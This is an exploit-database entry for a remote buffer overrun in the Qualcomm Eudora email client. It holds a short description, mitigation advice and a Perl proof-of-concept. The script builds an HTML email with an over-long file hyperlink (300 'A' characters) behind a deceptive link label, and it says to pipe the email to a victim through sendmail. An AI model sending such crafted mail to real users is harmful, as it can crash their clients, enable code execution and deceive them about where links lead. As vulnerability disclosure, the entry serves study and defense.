header-logo
Suggest Exploit
vendor:
Eudora
by:
9
CVSS
CRITICAL
Buffer Overrun
119
CWE
Product Name: Eudora
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:qualcomm:eudora
Metasploit:
Other Scripts:
Platforms Tested: Windows (confirmed), Apple Mac (potentially affected)

Qualcomm Eudora Remote Buffer Overrun Vulnerability

A remote attacker can exploit this vulnerability by sending a malicious HTML email with an excessively long hyperlink to a file resource. This can lead to the execution of arbitrary code in the context of the client user.

Mitigation:

It is recommended to update to the latest version of Qualcomm Eudora to mitigate this vulnerability. Avoid clicking on suspicious links or opening attachments from unknown sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10298/info

Qualcomm Eudora is reported to be prone to a remotely exploitable buffer overrun vulnerability. 

The issue is exposed when an excessively long hyperlink to a file resource is embedded in an HTML e-mail. This may permit remote attackers to execute arbitrary code via malicious e-mail in the context of the client user.

This issue was reported in Eudora on Windows platforms. Eudora for Apple Mac operating systems may be similarly affected, though this has not been confirmed.

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "<x-html>\n";
print "<a href=\"C:\\", "A"x300, "\">\n";
print "Fake URL to http://anywhere/I/want</a>\n";
print "</x-html>\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";